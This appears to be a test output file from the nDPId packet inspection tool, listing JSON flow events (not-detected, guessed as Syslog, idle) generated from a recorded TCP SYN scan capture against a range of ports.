-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 